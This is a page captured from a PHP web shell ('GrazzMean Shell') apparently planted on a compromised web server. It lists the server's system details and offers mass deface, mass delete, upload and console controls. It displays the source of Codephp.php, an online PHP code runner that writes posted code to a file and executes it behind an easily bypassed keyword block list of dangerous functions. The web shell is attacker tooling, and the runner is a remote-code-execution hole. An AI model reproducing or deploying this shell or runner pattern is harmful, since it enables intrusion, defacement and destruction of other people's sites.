shell bypass 403

GrazzMean Shell

: /www/wwwroot/jc.chatgptzh.com/app/index/controller/ [ drwxr-xr-x ]
Uname: Linux yisu-647059427c03a 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Software: nginx/1.22.1
PHP version: 7.3.31 [ PHP INFO ] PHP os: Linux
Server Ip: 103.146.158.90
Your Ip: 216.73.216.141
User: www (1000) | Group: www (1000)
Safe Mode: OFF
Disable Function:
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
upload mass deface mass delete console

name : Codephp.php 
<?php
// +----------------------------------------------------------------------
// | Copyright (c) 2020-08-10 http://myucms.com All rights reserved.
// +----------------------------------------------------------------------
// | Author: 梦雨 <50361804@qq.com>
// +----------------------------------------------------------------------
namespace app\index\controller;
use think\Controller;
use think\Db;
open_ts(); 
class Codephp extends Controller
{
    //html代码运行
    public function code()
    {
        $c = Db::name('codephp')->find(get('id'));
        if (get('id')) {
            $this->assign('c', $c);
        }
        return view(PATH.'/index/'.set('tpl').'/codephp/code.html');
    }
    //html代码运行a页面
    public function code_a()
    {
        $c = Db::name('codephp')->find(get('id'),0);
        if ($c['id']) {
            $this->assign('c', $c);
        } else {
            $code = '<?php
echo "Hello World!";
?>';
            $this->assign('content', $code);
        }
        return view(PATH.'/index/'.set('tpl').'/codephp/code_a.html');
    }
    //html代码运行b页面
    public function code_b()
    {
        $c = Db::name('codephp')->find(get('id'));
        if ($c['id']) {
            $this->assign('c', $c);
            $code = stripslashes(seo($c['content']));
        } else {
            $code = stripslashes('<?php
                echo "Hello World!";
                ?>');
        }
        if (_post()) {
            if (set('php')==0&&user('id')!=1) {
                file_put_contents(md5('run') . '.php', '在线运行关闭中');exit();        
            }
            $cars =explode(',', 'fopen,phpinfo,scandir,eval,assert,create_function,call_user_func,call_user_func_array,exec,file_put_contents,array_map,glob,unlink,opendir,@,$_FILES,move_uploaded_file,fread,fclose');
            foreach($cars as $x=>$v){
                if (strpos( $_POST['content'],$v) !== false) {
                    file_put_contents(md5('run') . '.php', '当前有恶意关键字不能被运行');
                    exit();        
                } 
            }
            $code = stripslashes($_POST['content']);
        }
        // if (!strstr($code, '<?php')) {
        //     $code = '<?php' . PHP_EOL . $code;
        // }
        file_put_contents(md5('run') . '.php', $code);
        header("Location:./" . md5('run') . ".php");
    }
}
© 2026 GrazzMean